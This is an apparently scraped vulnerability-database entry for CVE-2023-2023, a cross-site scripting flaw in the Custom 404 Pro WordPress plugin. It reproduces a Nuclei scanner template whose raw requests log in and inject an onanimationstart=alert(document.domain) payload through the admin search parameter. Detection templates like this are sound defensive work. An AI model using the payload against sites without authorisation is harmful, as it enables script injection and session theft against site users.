Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-2023
HistoryJul 07, 2023 - 9:38 a.m.

Custom 404 Pro < 3.7.3 - Cross-Site Scripting

2023-07-0709:38:49
ProjectDiscovery
github.com
2
cve2023
cross-site scripting
wordpress
wp-plugin
kunalnagar
authenticated

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.005 Low

EPSS

Percentile

76.5%

Custom 404 Pro before 3.7.3 is susceptible to cross-site scripting via the search parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
id: CVE-2023-2023

info:
  name: Custom 404 Pro < 3.7.3 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    Custom 404 Pro before 3.7.3 is susceptible to cross-site scripting via the search parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
  remediation: Fixed in version 3.7.3
  reference:
    - https://wpscan.com/vulnerability/8859843a-a8c2-4f7a-8372-67049d6ea317
    - https://wordpress.org/plugins/custom-404-pro/advanced/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-2023
    - https://github.com/GREENHAT7/pxplan
    - https://github.com/thatformat/Hvv2023
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-2023
    cwe-id: CWE-79
    epss-score: 0.00302
    epss-percentile: 0.69552
    cpe: cpe:2.3:a:kunalnagar:custom_404_pro:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: kunalnagar
    product: custom_404_pro
    framework: wordpress
  tags: cve2023,cve,wpscan,xss,wordpress,wp-plugin,authenticated,custom-404-pro,intrusive,kunalnagar

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/admin.php?page=c4p-main&s={{randstr}}%22%20style=animation-name:rotation%20onanimationstart=alert(document.domain)// HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code_2 == 200
          - contains(content_type_2, "text/html")
          - contains(body_2, "onanimationstart=alert(document.domain)//")
          - contains(body_2, "Custom 404 Pro")
        condition: and
# digest: 4b0a00483046022100ffbdca1dcfe309a8d8b09ff9fadc17e0082cd9a9841a9576be790a6570c9cffb022100bb9aa9a7bd2885181381d4c61929384437cb98432da45a3d913dd03bc1fdf7bb:922c64590222798bb761d5b6d8e72950

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.005 Low

EPSS

Percentile

76.5%